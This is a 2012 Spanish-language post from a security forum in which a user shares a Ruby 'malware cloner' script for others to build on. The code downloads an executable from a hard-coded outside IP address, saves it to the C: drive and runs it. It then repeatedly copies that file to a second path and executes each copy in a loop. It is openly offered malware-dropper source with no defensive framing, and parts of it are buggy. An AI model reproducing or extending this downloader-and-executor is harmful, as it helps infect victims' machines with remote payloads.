Tu comunidad de Seguridad Informatica

Para ver Todo el contenido del foro es necesario estar Registrado!
Antes de comentar o Aportar es Obligado Leer Las: Reglas | Rules
Ya Esta Disponible al publico "LeProject" el Videojuego del Foro Click Aquí Para Ver el Post.
Pitbull Security Labs "Extras" Esta Disponible! [ENTRA]

No estás conectado. Conéctate o registrate

Ver el tema anterior Ver el tema siguiente Ir abajo  Mensaje [Página 1 de 1.]

avatar
Usuario
Usuario

Ver perfil de usuario
el Mar Oct 16, 2012 5:23 pm
Bueno andaba aburrido como siempre y me puse a escribir un ejemplo de un "Clonador de Malwares".
Es un humilde code pero se puede mejorar añadiendo cosas yo solo os dejo un ejemplo de como sería mas o menos.

Aquí dejo el code explicado :


Código:
#Clonador de Malware - Ruby Code Example
#Coded by Sanko

require 'Win32API'
require 'open-uri'

#Aclaración , el @ delante de la var la convierte en var global

@filedown = 'C:\sk.exe' #var con archivo a descargar
@url = 'http://199.91.152.68/n8xy2336l4og/67fcyfx9xsf31mz/sk.exe' #var con ruta de descarga directa para el down
@fileacopiar = @filedown #igualamos la var del archivo que copiaremos o clonaremos a la var del archivo a descargar
@clon = 'C:\tets\clon.exe' #ruta en la que el clon se copiara
@timeclon = 5 #marcamos el tiempo del sleep

def copy
    system('Copy ' + @fileacopiar + ',' + @clon) #Copiamos el archivo a copiar en la ruta que indica @clon
end

def execute
    aplicacion = Thread.start do
          system @clon #ejecutamos al clon cuando se copie
    end
end

def down #función del downloader que nos descargara y ejecutara a @filedown/@fileacopiar
    @filedown = open(@filedown, "wb")
    @filedown.write(open(@url).read)
    @filedown.close
    appdown = Thread.start do
        system @filedown
    end
end

def executeandcopy
    var = 0
    while var < 10
        sleep @timeclon #cada @timeclon segundos...
        copy #ejecuta la funcion copy
        execute #ejecuta la funcion execute
    end
end

down #ejecutamos la funcion down
executeandcopy #Despues ejecutamos la funcion executeandcopy

Espero os sirva , no daré todo masticado pues quien quiera desarrollar el code tendra que pensar en como añadirle mas cosas.

Ver el tema anterior Ver el tema siguiente Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.